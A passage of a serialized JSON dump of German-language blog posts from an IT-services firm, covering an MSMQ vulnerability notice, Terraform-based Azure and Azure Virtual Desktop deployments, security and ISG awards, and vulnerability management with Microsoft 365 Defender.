",[7258,8296,8264],{"style":8141},[2970,8298],{},[7258,8300,8269],{"style":8120},[2559,8302],{"className":8303},[2556,8171],[2548,8305,8307],{"id":8306},"quellen","Quellen:",[367,8309,8310,8317],{},[370,8311,8312],{},[374,8313,8316],{"href":8314,"rel":8315},"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21554",[378],"Microsoft Message Queuing Remote Code Execution Vulnerability",[370,8318,8319],{},[374,8320,8323],{"href":8321,"rel":8322},"https://research.checkpoint.com/2023/queuejumper-critical-unauthorized-rce-vulnerability-in-msmq-service/",[378],"QueueJumper: Critical Unauthenticated RCE Vulnerability in MSMQ Service",{"title":402,"searchDepth":403,"depth":403,"links":8325},[8326],{"id":8306,"depth":403,"text":8307},{"DISABLEDtitleClass":7896,"categories":8328,"blogtitlepic":8329,"socialimg":8330,"customExcerpt":8331,"hreflang":8332},[1117],"head-critical-vulnerability","/blog/heads/head-critical-vulnerability.jpg","Mit dem Patch Tuesday von Microsoft wurde eine kritische Sicherheitslücke im Message Queuing Service behoben. Diese Lücke ermöglichte es einem Angreifer, Code ohne Authentifizierung auszuführen. Eine mögliche öffentliche Ausnutzung steht unmittelbar bevor. Es wird empfohlen, die Lücke schnell zu schließen oder eingehende Netzwerkverbindungen zu blockieren.",[8333],{"lang":2118,"href":8334},"/blog/security/csoc/event/2023/04/critical-vulnerability-en","2023-04-12","/posts/2023-04-12-critical-vulnerability",{"title":8213,"description":8219},"posts/2023-04-12-critical-vulnerability",[1117,8209,4707],"2Np9urKquihqW7zcY1SG-C_J9th7mFioR7GsjCYTTsE",{"id":8342,"title":8343,"author":8344,"body":8345,"cta":3,"description":8349,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":8393,"moment":8335,"navigation":415,"path":8398,"seo":8399,"stem":8400,"tags":8401,"webcast":406,"__hash__":8403},"content_de/posts/2023-04-14-workload-management-with-azure-foundation.md","Azure Foundation: Effizientes Cloud-Management mit Terraform",[130],{"type":350,"value":8346,"toc":8387},[8347,8350,8354,8357,8361,8364,8367,8371,8374,8380,8384],[353,8348,8349],{},"Die Azure Foundation bietet unseren Kunden eine solide Grundlage für die Arbeit mit Azure Services. Sie behandelt wichtige Themen wie Governance, Automation (Update- und Backup-Management), Networking und Security in einem vollautomatisierten Prozess. Zudem wird das Provisioning von AppZones, als klassische Landing Zones für Workloads in Azure, durch Code ausgeführt und bildet die Basis für das Onboarding von Application Services.",[629,8351,8353],{"id":8352},"warum-terraform","Warum Terraform?",[353,8355,8356],{},"Terraform ein beliebtes Infrastructure as Code (IaC) Tool. Im Gegensatz zu Azure Resource Manager (ARM) oder BICEP verwendet Terraform ein State-File außerhalb von Azure, das die geplanten Deployments mit dem aktuellen Zustand vergleicht und so klar darstellt, was geändert werden würde. Dieser Ansatz ermöglicht dem Kunden eine schnelle, sichere und standardisierte Nutzung der Services aus dem Azure-Universum.",[629,8358,8360],{"id":8359},"vorteile-der-azure-foundation-und-terraform","Vorteile der Azure Foundation und Terraform",[353,8362,8363],{},"Wie können Kunden diese Vielfalt an Azure Services sinnvoll nutzen? Bei der Azure Foundation haben wir uns bewusst für IaC und Azure Native Services entschieden. Nach der Bereitstellung der AppZones müssen Kunden diese mit den Azure Services füllen. Dies kann auf verschiedene Weise geschehen, z. B. über das Azure Portal, die Command Line Interface (CLI), ARM-Templates oder andere IaC Tools.",[353,8365,8366],{},"Um einen Technologiebruch zu vermeiden und die Vorteile der Azure Foundation auf Terraform-Basis ganzheitlich auszunutzen, empfehlen wir die Nutzung von Terraform als Deployment-Tool. So können beispielsweise State-Management und die Komponenten vorhergehender Layer genutzt werden.",[629,8368,8370],{"id":8369},"anwendungsszenarien-und-standard-workloads","Anwendungsszenarien und Standard Workloads",[353,8372,8373],{},"Mit Terraform können wir Standard Workloads wie KeyVault, Storage Accounts, virtuelle Server, Datenbanken usw. abbilden. Ganze Anwendungsszenarien können mit einer Terraform-Codebasis einfach und konsistent erstellt werden. Terraform hilft dabei, alle zu einer Anwendung in Azure gehörenden Komponenten in Code abzubilden und das Design vorzugeben. Aufbauend auf den AppZone-Deployments, die Aufgaben wie Resource Group, Tags, Monitoring, Networking, Budgets, RBAC etc. erledigen, können wir mit dem Workload Layer beginnen und den vorhandenen State nutzen, um darauf aufzubauen.",[353,8375,8376],{},[356,8377],{"alt":8378,"src":8379},"Azure Foundation Workload Management","https://res.cloudinary.com/c4a8/image/upload/v1681467497/blog/pics/img-azure-foundation-l95.png",[629,8381,8383],{"id":8382},"vereinfachung-des-deployments","Vereinfachung des Deployments",[353,8385,8386],{},"Dies erleichtert dem Kunden das moderne Deployment von Azure Services in einem sicheren, wiederholbaren und standardisierten Rahmen. Durch den deklarativen Ansatz von Terraform können Komponenten und deren Konfiguration beschrieben und jederzeit ersetzt oder erneut bereitgestellt werden. Ist eine Komponente der Applikation fehlerhaft, so kann diese entfernt und redeployed werden, was sich von herkömmlichen On-Premises-Lösungen unterscheidet. Es ist wichtig, auch die Datenhaltung auf diesen Ansatz auszurichten, damit die Infrastruktur jederzeit neu bereitgestellt werden kann, während die Daten schnell wieder zugreifbar sind und an die neuen Ressourcen angebunden werden (stateless).",{"title":402,"searchDepth":403,"depth":403,"links":8388},[8389,8390,8391,8392],{"id":8352,"depth":704,"text":8353},{"id":8359,"depth":704,"text":8360},{"id":8369,"depth":704,"text":8370},{"id":8382,"depth":704,"text":8383},{"titleClass":7896,"categories":8394,"blogtitlepic":8395,"socialimg":8396,"customExcerpt":8397},[1773],"head-workloads-azure-foundation","/blog/heads/head-workloads-azure-foundation.jpg","Die Azure Foundation in Kombination mit Terraform stellt eine leistungsstarke und automatisierte Cloud-Management-Lösung dar. Indem sie wichtige Themen wie Governance, Automation, Networking und Security integriert, bildet die Azure Foundation eine solide Basis für die Nutzung von Azure Services. Terraform ergänzt diese Grundlage als bevorzugtes Infrastructure as Code (IaC) Tool und ermöglicht Kunden, ihre Cloud-Infrastruktur auf sichere, wiederholbare und standardisierte Weise zu verwalten und bereitzustellen.","/posts/2023-04-14-workload-management-with-azure-foundation",{"title":8343,"description":8349},"posts/2023-04-14-workload-management-with-azure-foundation",[1773,6415,8402],"Terraform","xC5ZCl9M7_qgzamsYl9mupDOLHGnGt-49AMF9BanBwg",{"id":8405,"title":8406,"author":8407,"body":8408,"cta":3,"description":8412,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":8468,"moment":8476,"navigation":415,"path":8477,"seo":8478,"stem":8479,"tags":8480,"webcast":406,"__hash__":8481},"content_de/posts/2023-04-24-azure-virtual-desktop.md","Azure Virtual Desktop – Ja, aber automatisiert bitte!",[130],{"type":350,"value":8409,"toc":8463},[8410,8413,8416,8420,8423,8427,8431,8434,8437,8441,8444,8447,8450,8453,8456,8460],[353,8411,8412],{},"Azure Virtual Desktop ist kein neuer Service mehr, aber aus unserer Erfahrung heraus ein Azure Service, der viele Lücken schließt und sich bei unseren Kunden großer Beliebtheit erfreut. Eine AVD-Umgebung „schnell mal“ zu bauen, ist sicherlich für den Engineer, der mit Azure vertraut ist, kein Problem. Aber wie geht es dann weiter? Was meist als Testumgebung startet, wird schnell zum produktiv genutzten Workload, der damit auch ganz andere Anforderungen an einen sicheren und stabilen Betrieb hat.",[353,8414,8415],{},"Microsoft selbst bietet viele Features, um dies recht einfach zu ermöglichen. Die Anwendungsszenarien variieren stark, und für einige Aspekte gibt es noch keine Automatisierungslösungen. Beispielsweise unterscheiden sich die Pooled AVD und die Personal AVD Use Cases meist grundlegend. Um dennoch eine ganzheitliche, standardisierte und reproduzierbare Lösung bieten zu können, ist die Nutzung von Infrastructure-as-Code (IaC) unserer Meinung nach ein Must-Have.",[629,8417,8419],{"id":8418},"iac-und-terraform-für-avd-foundation","IaC und Terraform für AVD Foundation",[353,8421,8422],{},"Wie bei unserer Azure Foundation nutzen wir auch für die Bereitstellung der AVD Foundation Infrastructure-as-Code (IaC) auf Basis von Terraform. Dadurch können wir schnell und standardisiert, je nach Kundenszenario, die passgenaue AVD-Umgebung aufbauen. Im Rahmen eines Parametrisierungsworkshop werden die Bedürfnisse und Wünsche ermittelt, die vorhandene Infrastruktur analysiert und die benötigten Parameter für das Deployment zusammengetragen. Auf diese Weise können wir innerhalb weniger Tage eine AVD Personal Host Umgebung für den produkten Betrieb beim Kunden bereitstellen. Beim Pooled AVD Ansatz bieten wir gemeinsam mit der Image Factory ebenfalls eine automatisierte Lösung an, die sowohl das Image Management auf Codebasis umsetzt, als auch das Management der AVD-Umgebung selbst ermöglicht.",[356,8424],{"src":8425,"alt":8426},"https://res.cloudinary.com/c4a8/image/upload/v1681647046/blog/pics/img-avd-foundation-layer-concept.png","AVD Foundation Layer Concept",[629,8428,8430],{"id":8429},"personal-pools","Personal Pools",[353,8432,8433],{},"Bei Personal Hosts, die ähnlich wie physische Workstations der Nutzer behandelt werden, fokussiert sich die AVD-Foundation vor allem auf das Bereitstellen der nötigen Infrastruktur in Azure. In einem mehrschichtigen Ansatz werden nicht nur Monitoring-Lösungen implementiert, sondern auch Hosts, Pools, Workspaces und Anwendungen bereitgestellt. Als Basis dient dabei das Windows-Image direkt aus dem Microsoft Marketplace.",[353,8435,8436],{},"Die Softwareinstallation und -konfiguration auf den bereitgestellten Hosts erfolgt über eine Client-Management-Lösung, in unserem Fall Intune und RealmJoin, die sich stark am Autopilot Deployment physischer Clients orientiert. Für einen kostenoptimierten Betrieb bieten wir zudem die Möglichkeit, Hosts mithilfe von Azure Functions im Leerlauf anzuhalten und so Infrastrukturkosten zu reduzieren – ein Feature, das die aktuellen Scaling Plans von AVD noch nicht bieten. Dadurch können die Kosten für Personal Hosts erheblich gesenkt werden, ohne auf Reservations zurückgreifen zu müssen.",[629,8438,8440],{"id":8439},"pooled-pools","Pooled Pools",[353,8442,8443],{},"Die Herangehensweise bei Pooled Hosts orientiert sich stärker am klassischen Terminal-Server-Ansatz. Um die Flexibilität und Skalierbarkeit von AVD im Vergleich zu legacy Desktop-Virtualisierungslösungen voll auszuschöpfen, setzen wir bei Pooled Hosts auf sogenannte Golden Images. Diese ermöglichen es, bei Bedarf standardisierte Hosts in kürzester Zeit bereitzustellen. Die vollautomatisierte Erstellung dieser Golden Images erfolgt mithilfe unserer Image Factory, wobei das Image parametrisiert und konfiguriert werden kann.",[353,8445,8446],{},"Besonders interessant ist die automatisierte Software-Installation während des Imaging-Prozesses durch RealmJoin. Das manuelle Erstellen und Ablegen von Software-Paketen entfällt, stattdessen kann man auf einen Pool von über 1.000 fertigen Software-Paketen zugreifen oder individuelle Pakete verwenden. Die gleichzeitige Nutzung von RealmJoin für Standard-Clients und AVD-Hosts ermöglicht besonders große Synergien.",[353,8448,8449],{},"Die angepassten Images werden anschließend in einer Compute Gallery gespeichert und für das Deployment der Pools verwendet. Dieser Prozess kann sowohl für mehrere Host Pools mit unterschiedlichen Images parallelisiert als auch beliebig oft durchgeführt werden, um stets eine aktuelle Version zu erstellen.",[353,8451,8452],{},"Vom Customer-AVD-Workspace über die Profilshares bis hin zu den Hosts selbst wird alles vollständig automatisiert mithilfe von Terraform-Code in Pipelines erstellt. Die Profil Shares können dabei ohne direkte Line-of-Sight zum ADDS angelegt werden, und auch ein Management Client/Server ist nicht erforderlich. Alles wird direkt während des automatisierten Code Deployments erledigt, ohne dass manuelle Schritte notwendig sind.",[353,8454,8455],{},"Beim späteren Anpassen der Poolgrößen übernimmt unser AVD-Manager die automatisierte Verwaltung von AAD- und Intune-Objekten.",[356,8457],{"src":8458,"alt":8459},"https://res.cloudinary.com/c4a8/image/upload/v1681651495/blog/pics/img-avd-foundation-infrastructure.png","AVD Foundation Infrastructure",[353,8461,8462],{},"Falls Sie genug von halbautomatisierten AVD-Umgebungen oder semi-produktiven Zuständen haben, zögern Sie nicht, uns zu kontaktieren. Wir stellen Ihnen gerne unsere ausgereifte AVD-Foundation-Lösung im Detail vor und zeigen Ihnen, wie sie Ihren Arbeitsalltag revolutionieren kann.",{"title":402,"searchDepth":403,"depth":403,"links":8464},[8465,8466,8467],{"id":8418,"depth":704,"text":8419},{"id":8429,"depth":704,"text":8430},{"id":8439,"depth":704,"text":8440},{"titleClass":7896,"categories":8469,"blogtitlepic":8470,"socialimg":8471,"customExcerpt":8472,"hreflang":8473},[1773],"head-avd-foundation","/blog/heads/head-avd-foundation.jpg","Entdecken Sie eine einzigartige Lösung für Azure Virtual Desktop (AVD) - die AVD Foundation! Mit Infrastructure-as-Code (IaC) und Terraform bieten wir standardisierte und automatisierte Lösungen für Personal und Pooled Hosts. Erfahren Sie, wie Sie Ihre AVD-Umgebung schnell aufbauen, optimieren und skalieren können, um die Anforderungen Ihres Unternehmens zu erfüllen. Setzen Sie halbautomatischen Umgebungen und halbproduktiven Zuständen ein Ende - verbessern Sie Ihren Arbeitsalltag mit AVD Foundation!",[8474],{"lang":2118,"href":8475},"/blog/azure/avd/terraform/2023/04/azure-virtual-desktop-en","2023-04-24","/posts/2023-04-24-azure-virtual-desktop",{"title":8406,"description":8412},"posts/2023-04-24-azure-virtual-desktop",[1773,8402,7509],"KtOHiGBYsEFgkymsSmlJGqL73AZYC4OTB35n0EVXdj0",{"id":8483,"title":8484,"author":8485,"body":8486,"cta":3,"description":8490,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":8540,"moment":8548,"navigation":415,"path":8549,"seo":8550,"stem":8551,"tags":8552,"webcast":406,"__hash__":8553},"content_de/posts/2023-04-25-security-excellence-awards.md","Top-5 MSSPs weltweit – Security-Elite während der RSA 2023 geehrt",[191],{"type":350,"value":8487,"toc":8533},[8488,8491,8495,8498,8502,8505,8509,8512,8516,8519,8521,8524],[353,8489,8490],{},"Wir freuen uns riesig, dass wir bei den Microsoft Security Excellence Awards 2023 in der Kategorie “Managed Security Service Provider (MSSP) of the Year” weltweit zu den Top 5 gehören. Diese Auszeichnung ist ein Beweis für den unermüdlichen Einsatz und die Expertise unseres Cloud Security Operations Center (CSOC) und unseres innovativen MXDR Serviceangebot.",[629,8492,8494],{"id":8493},"eine-zusammenkunft-von-sicherheitspionieren","Eine Zusammenkunft von Sicherheitspionieren",[353,8496,8497],{},"Die Microsoft Security Excellence Awards finden im Rahmen der RSA Conference 2023 in San Francisco statt. Die renommierte Veranstaltung würdigt die Leistungen der weltweit besten Security-Unternehmen des vergangenen Jahres unter den Mitgliedern der Microsoft Intelligent Security Association (MISA). MISA ist eine starke Allianz, die Microsoft-Führungskräfte, Fachexperten, unabhängige Softwareanbieter und MSSPs zusammenbringt, um den stetig wachsenden Cyber-Bedrohungen, denen wir heute gegenüberstehen, entgegenzuwirken.",[629,8499,8501],{"id":8500},"unser-bahnbrechender-mxdr-service","Unser bahnbrechender MXDR-Service",[353,8503,8504],{},"Unser MXDR-Serviceangebot, das von unserem engagierten CSOC-Team betreut wird, besteht aus einem umfassenden Security Operations Center (SOC), das 24/7/365 proaktive Such-, Monitoring- und Response-Funktionen bietet. Diese fortschrittliche Lösung, die tief in die Microsoft-Sicherheitsplattform integriert ist, verbindet technologische Expertise mit von Menschen geführten Dienstleistungen und wurde von Microsoft-Ingenieuren selbst geprüft.",[629,8506,8508],{"id":8507},"ein-zentrum-für-sicherheitsexzellenz","Ein Zentrum für Sicherheitsexzellenz",[353,8510,8511],{},"Unser in Deutschland ansässiges Cloud Security Operations Center beherbergt erfahrene und zertifizierte Sicherheitsingenieure mit umfangreichem technischen IT-Sicherheitswissen. Wir unterstützen eine Vielzahl von IT-Infrastrukturen für unsere Unternehmenskunden, einschließlich OT/IoT, On-Premises und verschiedenen Cloud-Umgebungen. Unser CSOC nutzt modernste Microsoft-Sicherheitswerkzeuge, um alle Systeme in Enterprise Umgebungen, wie z.B. Checkpoint, CISCO, Fortinet, Windows Server & Clients, Office 365, Citrix, SAP und Linux, zu überwachen.",[629,8513,8515],{"id":8514},"eine-deutsche-meisterleistung-in-sachen-cybersecurity","Eine deutsche Meisterleistung in Sachen Cyber Security",[353,8517,8518],{},"Wir fühlen uns geehrt, der einzige deutsche Finalist in der Kategorie “Managed Security Service Provider (MSSP) of the Year” zu sein. Diese Auszeichnung unterstreicht unser unermüdliches Engagement für die Bereitstellung erstklassiger Sicherheitsdienste und -lösungen für unsere weltweit verteilten Kunden.",[629,8520,1088],{"id":1087},[353,8522,8523],{},"Während wir unseren Erfolg bei den Microsoft Security Excellence Awards 2023 feiern, möchten wir der gesamten MISA-Community unseren Dank für ihr unermüdliches Engagement für die Sicherheit unserer gemeinsamen Kunden aussprechen. Wir werden weiterhin bahnbrechende Sicherheitsdienste und -lösungen bereitstellen und freuen uns auf die zukünftigen Innovationen und Meilensteine, die wir gemeinsam erreichen werden.",[353,8525,8526,8527,8532],{},"Für weitere Informationen zu unserem MXDR-Service besuchen Sie ",[374,8528,8531],{"href":8529,"style":8530},"/de/security/cloud-security-operations-center","color: #FCD116;","unsere Website."," Wir freuen uns darauf, von Ihnen zu hören!",{"title":402,"searchDepth":403,"depth":403,"links":8534},[8535,8536,8537,8538,8539],{"id":8493,"depth":704,"text":8494},{"id":8500,"depth":704,"text":8501},{"id":8507,"depth":704,"text":8508},{"id":8514,"depth":704,"text":8515},{"id":1087,"depth":704,"text":1088},{"titleClass":7896,"categories":8541,"blogtitlepic":8542,"socialimg":8543,"customExcerpt":8544,"hreflang":8545},[410],"head-misa-excellence-award","/blog/heads/head-misa-excellence-award.jpg","glueckkanja hat sich bei den Microsoft Security Excellence Awards 2023 in der hart umkämpften Kategorie Security MSSP of the Year einen beeindruckenden Platz unter den Top 5 gesichert. Diese prestigeträchtige Auszeichnung ist ein Beweis für das unermüdliche Engagement und die Expertise unseres Cloud Security Operations Center (CSOC) sowie für die bahnbrechenden Innovationen, die hinter unserem MXDR-Serviceangebot stehen.",[8546],{"lang":2118,"href":8547},"/blog/award/csoc/event/security/2023/04/security-excellence-awards-en","2023-04-25","/posts/2023-04-25-security-excellence-awards",{"title":8484,"description":8490},"posts/2023-04-25-security-excellence-awards",[3933,4707,1562,1117],"xIUxbMUqLBsYKK6OtEH_bgZ5fHlsTwvkJ-fYy9BbFoo",{"id":8555,"title":8556,"author":8557,"body":8558,"cta":3,"description":8562,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":8619,"moment":8620,"navigation":415,"path":8629,"seo":8630,"stem":8631,"tags":8632,"webcast":406,"__hash__":8633},"content_de/posts/2023-05-04-isg-2023.md","Leader für Microsoft 365 Services und Managed Azure",[191],{"type":350,"value":8559,"toc":8615},[8560,8563,8567,8570,8574,8585,8591,8595,8598,8601,8612],[353,8561,8562],{},"Wenn es darum geht, in der Welt der Managed Services für Microsoft 365 und Azure führend zu sein, taucht in der Branche immer wieder ein Name auf: glueckkanja. Das Unternehmen hat sich seinen Platz als Leader in der ISG-Studie 2023 erneut gesichert und damit bewiesen, dass es seine Expertise und sein Engagement weiter ausbaut.",[629,8564,8566],{"id":8565},"microsoft-365-services-im-fokus-der-kundenbedürfnisse","Microsoft 365 Services: Im Fokus der Kundenbedürfnisse",[353,8568,8569],{},"Die Workplace Services von glueckkanja sind speziell auf die Bedürfnisse von Kunden mit mehr als 1.000 Nutzern zugeschnitten. Dabei setzt das Unternehmen auf eine Vision und Umsetzungsstrategie, die sich nahtlos in die Anforderungen der Kunden einfügt. Der Erfolg dieser Strategie zeigt sich auch im wachsenden Neukundengeschäft.",[5786,8571,8573],{"id":8572},"stärken-im-überblick","Stärken im Überblick",[367,8575,8576,8579,8582],{},[370,8577,8578],{},"Kundenorientierung: glueckkanja ist darauf bedacht, seinen Kunden praktischen Nutzen zu bieten und unterstützt sie beispielsweise bei zeitaufwändigen Aufgaben wie der Verteilung und dem Management der Software-Zertifikate in der Cloud.",[370,8580,8581],{},"Klare Zielsetzung: Mit dem Anspruch, der führende Anbieter von Managed Services für Microsoft Workplace und Azure Datacenter im deutschen Mittelstand zu werden, hat sich glueckkanja ein klares Ziel gesetzt und verfolgt dieses konsequent.",[370,8583,8584],{},"Technik im Dienst der Kunden: Die Verwendung von Windows Platform und Windows Enterprise Clients mit den Funktionen für Collaboration und dem Schutz durch Microsoft 365 Defender ermöglicht es den Nutzer*innen, produktiv zu sein, wo immer sie arbeiten müssen.",[353,8586,8587],{},[356,8588],{"alt":8589,"src":8590},"Leader Microsoft 365","https://res.cloudinary.com/c4a8/image/upload/v1683195538/blog/pics/img-isg-m365-badge.jpg",[629,8592,8594],{"id":8593},"managed-services-für-azure-erfolg-durch-zufriedenheit-und-sicherheit","Managed Services für Azure: Erfolg durch Zufriedenheit und Sicherheit",[353,8596,8597],{},"glueckkanja hat es geschafft, sich als einer der führenden deutschen Partner für Managed Services auf der Azure-Plattform zu positionieren und dabei das Vertrauen ihrer Kunden zu stärken.",[5786,8599,8573],{"id":8600},"stärken-im-überblick-1",[367,8602,8603,8606,8609],{},[370,8604,8605],{},"Erfolgreiche Reorganisation: Durch den erfolgreichen Abschluss des Mergers konnte das Unternehmen eine hohe Mitarbeiterzufriedenheit erreichen.",[370,8607,8608],{},"Starke Partnerschaft mit Microsoft: Mit fünf der sechs neuen Solutions Partner Designations zeigt glueckkanja, dass es die hohen Anforderungen von Microsoft erfüllt und das optimale Software Deployment für Kunden beherrscht.",[370,8610,8611],{},"Security im Fokus: glueckkanja setzt bei seinen Sicherheitskonzepten zu 100% auf die Microsoft-Produktpalette und vermeidet so unnötige Komplexität durch den Verzicht auf 3rd-Party-Lösungen.",[353,8613,8614],{},"Die ISG-Studie 2023 unterstreicht erneut die beeindruckende Position von glueckkanja als Branchenführer für Microsoft 365 Services und Managed Azure. Die Kombination aus Kundennutzen, Mitarbeiterzufriedenheit und technischem Know-how zeigt, dass glueckkanja die richtige Wahl für Unternehmen ist, die einen verlässlichen Partner für ihre Microsoft 365- und Azure-Anforderungen suchen. Mit einer beständigen Innovationskraft und einer engen Partnerschaft mit Microsoft bleibt glueckkanja für Kunden, die auf der Suche nach effizienten und sicheren Lösungen sind, ein verlässlicher Partner.",{"title":402,"searchDepth":403,"depth":403,"links":8616},[8617,8618],{"id":8565,"depth":704,"text":8566},{"id":8593,"depth":704,"text":8594},{"titleClass":7896,"date":8620,"categories":8621,"blogtitlepic":8622,"socialimg":8623,"customExcerpt":8624,"keywords":8625,"hreflang":8626},"2023-05-09",[410],"head-isg-2023","/blog/heads/head-isg-2023.jpg","glueckkanja wurde in der ISG-Studie 2023 erneut als Branchenführer für Managed Services im Bereich Microsoft 365 und Azure bestätigt. Mit einer klaren Vision und Umsetzungsstrategie, einem kundenorientierten Ansatz sowie einem starken Fokus auf Sicherheit und Mitarbeiterzufriedenheit zeigt das Unternehmen, dass es den Bedürfnissen seiner Kunden gerecht wird.","Managed Services Lösungen, Azure Plattform, Microsoft 365 Services, effiziente IT-Partnerschaft, deutsche Partner, Cloud-Dienste, Kundenzufriedenheit, Vertrauen, innovative IT-Lösungen, Sicherheit und Kompatibilität, problemorientierte Strategien, erfolgreiche Software-Rollouts",[8627],{"lang":2118,"href":8628},"/blog/award/isg/corporate/2023/05/isg-2023-en","/posts/2023-05-04-isg-2023",{"title":8556,"description":8562},"posts/2023-05-04-isg-2023",[3933,6430],"mWxE4eU26HBXCJMjGR0ma1n3dPyXb0pc8jKd1tLfeCE",{"id":8635,"title":8636,"author":8637,"body":8638,"cta":3,"description":8642,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":8709,"moment":8710,"navigation":415,"path":8719,"seo":8720,"stem":8721,"tags":8722,"webcast":406,"__hash__":8723},"content_de/posts/2023-05-12-vulnerability-management-defender.md","Vulnerablity Management mit Microsoft 365 Defender",[24],{"type":350,"value":8639,"toc":8703},[8640,8643,8648,8651,8655,8664,8667,8671,8674,8680,8684,8687,8691,8694,8700],[353,8641,8642],{},"Wir alle möchten Sicherheitsvorfälle in der IT vermeiden und müssen daher unsere Angriffsfläche kennen und wo immer möglich reduzieren. Neben Tools wie Microsoft Defender Vulnerability Management sind reibungslose Prozesse im Applikation Management und im Schwachstellenmanagement besonders hilfreich.",[353,8644,8645],{},[356,8646],{"alt":2273,"src":8647},"https://res.cloudinary.com/c4a8/image/upload/v1683885342/blog/pics/img-secure-score.jpg",[353,8649,8650],{},"Bei einem Blick auf das Microsoft 365 Defender Portal, insbesondere Defender for Endpoint, staunen viele über die gesammelten Daten zu vulnerablen Anwendungen und schwachen Konfigurationen. Wer kennt es nicht? Jeden Monat tauchen neue Update-Empfehlungen für Windows 10, Office und Google Chrome im Dashboard auf. Außerdem stehen rund 70 Empfehlungen für eine sichere Konfiguration von Endgeräten auf der Liste. Stellt sich die Frage, wie man den unzähligen Empfehlungen Herr werden kann und einen akzeptablen Exposure oder Secure Score erreicht. Was wäre ein akzeptabler Wert für ein Unternehmen und wie sollte man messen? Um diese Fragen zu beantworten, werfen wir zunächst einen Blick auf die verschiedenen Produkte und Scores.",[629,8652,8654],{"id":8653},"funktionen-im-microsoft-365-defender-portal","Funktionen im Microsoft 365 Defender Portal",[353,8656,8657,8658,8663],{},"Im ",[374,8659,8662],{"href":8660,"rel":8661},"https://security.micosoft.com",[378],"Microsoft 365 Defender Portal"," findet sich der allgemeine Secure Score, der alle Bereiche des M365 Tenants abdeckt, einschließlich Endgeräte, Identitäten, Daten und Anwendungen. Ein hoher Score signalisiert maximale Sicherheitskonfigurationen. Microsoft empfiehlt eine möglichst sichere Konfiguration der einzelnen Tools und vergleicht diese mit der aktuellen Tenant Konfiguration. Dabei verfügt jedes einzelne Defender Produkt über einen eigenen Score (beispielsweise Secure Score for Devices oder Identity Secure Score), der in den allgemeinen Secure Score einbezogen wird. Dieser steigt, sobald die von Microsoft empfohlenen Einstellungen korrekt umgesetzt oder durch Alternativen mitigiert worden sind.",[353,8665,8666],{},"Mit dem Defender for Endpoint erhalten wir eine detaillierte Auflistung der Schwachstellen auf Endgeräten wie Workplace, Servern und mobilen Geräten. Dazu zählen vulnerable Anwendungen, aber auch unsichere Konfigurationen, wie beispielsweise eine deaktivierte Attack Surface Reduction Rule. In Zukunft bietet das Add-On Defender for Vulnerability Management noch mehr Insights zu Browser Erweiterungen, Zertifikaten und Firmware-Daten. Darüber hinaus lassen sich vulnerable Anwendungen zukünftig blockieren.",[629,8668,8670],{"id":8669},"bedeutung-des-secure-score-for-devices-und-des-exposure-score","Bedeutung des Secure Score for Devices und des Exposure Score",[353,8672,8673],{},"Im Modul Threat & Vulnerability Management (TVM) des Defender for Endpoint gibt es zwei Scores: Der Secure Score for Devices ist Teil des allgemeinen Secure Scores und bewertet ausschließlich Endgeräte. Der Exposure Score hingegen zeigt an, wie verwundbar die Geräte sind. Je höher der Exposure Score, desto mehr Schwachstellen gibt es auf den Geräten. Daher ist das Ziel, den Exposure Score möglichst gering zu halten. Wenn die Empfehlungen von Microsoft befolgt werden, verringert sich der Exposure Score und der Secure Score steigt in der Regel an. Die Empfehlungen unterscheiden sich zwischen Konfigurationsänderungen und Software-Update. Um die Empfehlungen hinsichtlich der Konfigurationen abzuarbeiten, bedarf es häufig einem Team aus Security-, Workplace-, Netzwerk- und Serververantwortlichen.",[353,8675,8676],{},[356,8677],{"alt":8678,"src":8679},"Software Update Cycle","https://res.cloudinary.com/c4a8/image/upload/v1683885775/blog/pics/img-software-updates-cycle.jpg",[629,8681,8683],{"id":8682},"herausforderungen-und-lösungen-bei-software-updates-und-upgrades","Herausforderungen und Lösungen bei Software-Updates und -Upgrades",[353,8685,8686],{},"Leider sind die Empfehlungen für Software-Updates oder -Upgrades nicht so einfach zu handhaben. Vor allem Schwachstellen in Anwendungen sind sehr volatil – warum sonst gäbe es jeden Monat einen Patch-Day? Wir werden also immer wieder einen hohen Exposure Score aufgrund neuer Softwareschwachstellen haben. Akute Maßnahmen sind hier oft nicht hilfreich; im Unternehmen müssen funktionierende Aktualisierungsprozesse implementiert werden.",[629,8688,8690],{"id":8689},"überwachung-extern-zugänglicher-systeme-mit-microsoft-defender-external-attack-surface-management","Überwachung extern zugänglicher Systeme mit Microsoft Defender External Attack Surface Management",[353,8692,8693],{},"Neben den eigenen Endgeräten und Servern gibt es eine weitere große Angriffsfläche. Extern zugängliche Systeme können mit Microsoft Defender External Attack Surface Management überwacht werden. Die unbekannten Schwachstellen sind keine Blackbox, wir empfehlen regelmäßige Assessments hinsichtlich der Infrastruktur, und auch ein PenTest oder Red Teaming Events können unbekannte Angriffsflächen aufzeigen.",[353,8695,8696],{},[356,8697],{"alt":8698,"src":8699},"Microsoft Defender External Attack Surface Management","https://res.cloudinary.com/c4a8/image/upload/v1683886771/blog/pics/img-surface-management.jpg",[353,8701,8702],{},"Microsoft bietet derzeit die Möglichkeit einen umfänglichen Überblick über die eigene Angriffsfläche sowie die vorhandenen Schwachstellen zu verschaffen. Die Mitigation bzw. das Verringern der Schwachstellen erfordert jedoch einen hohen Aufwand und meist neue Prozesse.",{"title":402,"searchDepth":403,"depth":403,"links":8704},[8705,8706,8707,8708],{"id":8653,"depth":704,"text":8654},{"id":8669,"depth":704,"text":8670},{"id":8682,"depth":704,"text":8683},{"id":8689,"depth":704,"text":8690},{"titleClass":7896,"date":8710,"categories":8711,"blogtitlepic":8712,"socialimg":8713,"customExcerpt":8714,"keywords":8715,"hreflang":8716},"2023-05-12",[1117],"head-vulnerability-management","/blog/heads/head-vulnerability-management.jpg","Um Angriffe effektiv zu verhindern, ist das frühzeitige Erkennen von Sicherheitslücken und deren Beseitigung, etwa durch das Einspielen von Patches, unerlässlich. Angesichts der zunehmend schmalen Zeitspanne zwischen der Entdeckung einer Sicherheitslücke und den ersten darauf zielenden Angriffen, gewinnt ein effizientes und gut strukturiertes Schwachstellenmanagement zunehmend an Bedeutung.","IT-Sicherheit, Microsoft Defender Vulnerability Management, Applikation Management, Schwachstellenmanagement, Microsoft 365 Defender Portal, Defender for Endpoint, Secure 